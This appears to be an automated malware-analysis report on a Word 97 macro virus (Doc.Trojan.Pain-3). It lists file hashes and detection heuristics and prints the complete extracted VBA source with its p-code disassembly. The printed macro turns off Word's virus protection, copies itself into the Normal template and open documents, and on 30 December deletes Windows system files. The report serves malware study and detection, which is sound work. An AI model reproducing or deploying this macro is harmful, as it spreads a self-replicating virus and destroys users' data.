Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 967811803482783b…

MALICIOUS

Office (OLE)

27.0 KB Created: 2001-08-07 14:10:00 Authoring application: Microsoft Word 8.0 First seen: 2015-10-02
MD5: d7c5a5196569da081d2294c5d9e677c0 SHA-1: 80647b84868583f0da8ce0d11a4372c48478f19e SHA-256: 967811803482783bb70a195f0da20b2d187264ff63b396a40adedcc31b4ccae3
168 Risk Score

Heuristics 5

  • ClamAV: Doc.Trojan.Pain-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Pain-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5280 bytes
SHA-256: e11cf9c7833e45adc555e31d312ea7b249a3d3c2f121582747bc0077697db348
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub AutoClose()
On Error Resume Next
S = ActiveDocument.Saved
DisableAutoMacro = False
Text = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Countoflines)
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If Left(Date, 5) = "30.12" Then Kill ("C:\Windows\System\*.*"): Kill ("C:\Windows\*.*")
Set Mac = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then
Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
For Each Control In CommandBars("Menu Bar").Controls(6).Controls
If Control.Type = 10 Then
For I = 1 To Control.Controls.Count
If Right(Control.Controls(I).Caption, 5) = "Basic" Then Control.Delete
Next I
End If
Next Control
End If
Set Mac = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
With Dialogs(wdDialogFileSummaryInfo): .Keywords = "Word97-2k.Macro.PAIN": .Execute: End With
If ActiveDocument.Path <> "" Then ActiveDocument.Save
ActiveDocument.Saved = S
End Sub



' Processing file: /opt/analyzer/scan_staging/e4e4877f01a94d31ad47d75ec4be565d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2828 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub AutoClose())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St S 
' Line #4:
' 	LitVarSpecial (False)
' 	St DisableAutoMacro 
' Line #5:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd Countoflines 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St Then 
' Line #6:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #7:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0000 
' 	EndWith 
' Line #8:
' 	Ld Date 
' 	LitDI2 0x0005 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0005 "30.12"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0015 "C:\Windows\System\*.*"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	BoS 0x0000 
' 	LitStr 0x000E "C:\Windows\*.*"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #9:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set Mac 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Then 
' 	Ne 
' 	IfBlock 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	Ld Then 
' 	Ld Mac 
' 	ArgsMemCall AddfromString 0x0001 
' Line #12:
' 	StartForVariable 
' 	Ld Control 
' 	EndForVariable 
' 	LitDI2 0x0006 
' 	LitStr 0x0008 "Menu Bar"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemLd Controls 
' 	ForEach 
' Line #13:
' 	Ld Control 
' 	MemLd TypeOf 
' 	LitDI2 0x000A 
' 	Eq 
' 	IfBlock 
' Line #14:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Control 
' 	MemLd Controls 
' 	MemLd Count 
' 	For 
' Line #15:
' 	Ld I 
' 	Ld Control 
' 	ArgsMemLd Controls 0x0001 
' 	MemLd Caption 
' 	LitDI2 0x0005 
' 	ArgsLd Right 0x0002 
' 	LitStr 0x0005 "Basic"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld Control 
' 	ArgsMemCall Delete 0x0000 
' 	EndIf 
' Line #16:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	NextVar 
' Line #17:
' 	EndIfBlock 
' Line #18:
' 	StartForVariable 
' 	Ld Control 
' 	EndForVariable 
' 	NextVar 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set Mac 
' Line #21:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Then 
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	Ld Then 
' 	Ld Mac 
' 	ArgsMemCall AddfromString 0x0001 
' 	EndIf 
' Line #22:
' 	StartWithExpr 
' 	Ld wdDialogFileSummaryInfo 
' 	ArgsLd Dialogs 0x0001 
' 	With 
' 	BoS 0x0000 
' 	LitStr 0x0014 "Word97-2k.Macro.PAIN"
' 	MemStWith Keywords 
' 	BoS 0x0000 
' 	ArgsMemCallWith Execute 0x0000 
' 	BoS 0x0000 
' 	EndWith 
' Line #23:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #24:
' 	Ld S 
' 	Ld ActiveDocument 
' 	MemSt Saved 
' Line #25:
' 	EndSub 
' Line #26:
' Line #27: